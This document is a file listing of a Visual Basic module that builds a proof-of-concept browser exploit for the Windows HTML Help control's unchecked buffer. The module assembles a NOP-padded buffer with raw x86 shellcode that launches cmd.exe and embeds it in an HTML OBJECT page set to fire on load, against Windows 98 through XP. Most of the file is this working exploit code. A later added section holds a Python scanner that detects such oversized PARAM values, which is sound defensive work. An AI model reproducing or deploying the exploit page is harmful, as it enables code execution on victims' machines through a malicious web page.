
📄 module1.bas

📁 A passive-attack code sample written in VB
Attribute VB_Name = "Module1"
Global NbSck As Integer
Global EIP As Variant
Global EBP As Variant
Global Buffer As Variant
Global ShellCodeFrst As Variant
Global ShellCode As Variant
Global Html_Page As Variant

Public Sub Buildin_The_BuFFer()

''''' The buffer is laid out like this:
'whatever.chm-Nop-ShellcodeFrst-Nop-ShellCode-Nop-Ebp-Eip
'The NOPs are unimportant
'ShellcodeFrst does : add edi,46
'                   : jmp edi
'(Shellcode is at EDI)

'ShellCode does : Starts up a cmd.exe (not remote) and crashes IE
'               : taken from a paper by David Litchfield
'
'This proof of concept works with
'Microsoft Windows XP Kernel Version 5.1.2600.0

'Affected software:
' Microsoft Windows 98
' Microsoft Windows 98 Second Edition
' Microsoft Windows Millennium Edition
' Microsoft Windows NT 4.0
' Microsoft Windows NT 4.0, Terminal Server Edition
' Microsoft Windows 2000
' Microsoft Windows XP

'Size of the Buffer depends on the Windows Version
'Based on the Unchecked Buffer in Windows Help
'Other cool modif of this "proof of concept" would be nice to see ;)
'sylvain.descoteaux@sympatico.ca



''''''''''''''''''''' FIRST SHELLCODE THAT POINT TO THE BIG SHELLCODE ''''''''''
ShellCodeFrst = Chr(131) + Chr(199) + Chr(46) + Chr(255) + Chr(231)
For i = 1 To 14
nop = nop + Chr(144)
Next i
ShellCodeFrst = "x.chm" + nop + ShellCodeFrst + nop + Chr(144)

''''''''''''''''''''' THE BIG SHELLCODE ''''''''''''''
nop = ""
ShellCode = ""
ShellCode = Chr(139) + Chr(236) + Chr(51) + Chr(255) + Chr(87) + Chr(131) + Chr(236) + Chr(4) + Chr(198) + Chr(69) + Chr(248) + Chr(99) + Chr(198) + Chr(69) + Chr(249) + Chr(109) + Chr(198) + Chr(69) + Chr(250) + Chr(100) + Chr(198) + Chr(69) + Chr(251) + Chr(46) + Chr(198) + Chr(69) + Chr(252) + Chr(101) + Chr(198) + Chr(69) + Chr(253) + Chr(120) + Chr(198) + Chr(69) + Chr(254) + Chr(101) + Chr(184) + Chr(68) + Chr(128) + Chr(194) + Chr(119) + Chr(80) + Chr(141) + Chr(69) + Chr(248) + Chr(80) + Chr(255) + Chr(85) + Chr(244)
For i = 1 To 349
nop = nop + Chr(144)
Next i
ShellCode = nop + ShellCode + nop + Chr(144)

''''''''''''''''''' THE BUFFER '''''''''''''''''
Buffer = ShellCodeFrst + ShellCode + EBP + EIP + """>"

''''''''''''''''''' THE HTML PAGE WITH THE BUFFER ''''''''
Html_Page = "<OBJECT id=weurg type=""application/x-oleobject""" + vbCrLf
Html_Page = Html_Page + "classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" + vbCrLf
Html_Page = Html_Page + "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" + vbCrLf
Html_Page = Html_Page + "width=80" + vbCrLf
Html_Page = Html_Page + "height=20>" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Command"" value=""Related Topics, MENU"">" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Item1""" + vbCrLf
Html_Page = Html_Page + "value=""EN_CHANGE;c:\" + Buffer + vbCrLf
Html_Page = Html_Page + "</OBJECT>" + vbCrLf
Html_Page = Html_Page + "<script>weurg.HHclick()</script>" + vbCrLf
End Sub
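
A defensive counterpart to the module above, added here and not part of the original file: a Python scanner that flags HTML in which an OBJECT element using the HHCtrl classid shown above carries an Item PARAM that is overlong, padded with a long repeated run, or contains non-printable characters. The thresholds, the function names and both sample pages are assumptions constructed for this example; the samples hold filler characters only.

```python
from html.parser import HTMLParser
# CLSID of the HTML Help ActiveX control (hhctrl.ocx), as used on this page.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Assumed thresholds for this sketch; tune them against real help pages.
MAX_ITEM_LEN = 260   # legitimate Item values are a short title plus a path
MAX_RUN = 16         # longest tolerated run of one repeated character

def longest_run(s):
    """Length of the longest run of one repeated character in s."""
    best, run, prev = 0, 0, None
    for ch in s:
        run = run + 1 if ch == prev else 1
        prev, best = ch, max(best, run)
    return best

class HHCtrlScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_hhctrl = False   # True while inside an HHCtrl <OBJECT>
        self.findings = []       # (param name, value length, [reasons])

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            cid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            self.in_hhctrl = (cid == HHCTRL_CLSID)
        elif tag == "param" and self.in_hhctrl:
            name, value = a.get("name", "").lower(), a.get("value", "")
            checks = [("overlong", len(value) > MAX_ITEM_LEN),
                      ("repeated-run", longest_run(value) > MAX_RUN),
                      ("non-printable", any(not 0x20 <= ord(c) <= 0x7e for c in value))]
            reasons = [label for label, hit in checks if hit]
            if name.startswith("item") and reasons:
                self.findings.append((name, len(value), reasons))

    def handle_endtag(self, tag):
        if tag == "object":
            self.in_hhctrl = False

def scan(html_text):
    """Return findings for every suspicious Item* PARAM in html_text."""
    scanner = HHCtrlScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings

# Constructed samples: same OBJECT/PARAM shape as the page, filler bytes only.
_HEAD = '<OBJECT classid="clsid:%s">\n<PARAM name="Item1" value="' % HHCTRL_CLSID
BENIGN = _HEAD + 'Overview;help.htm">\n</OBJECT>'
OVERSIZED = _HEAD + 'EN_CHANGE;c:\\x.chm' + "A" * 600 + '">\n</OBJECT>'
```

When scanning files from disk, decode them as latin-1 so every byte maps to one character; the non-printable check can fire on legitimately localized titles, so treat it as the weakest of the three signals.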
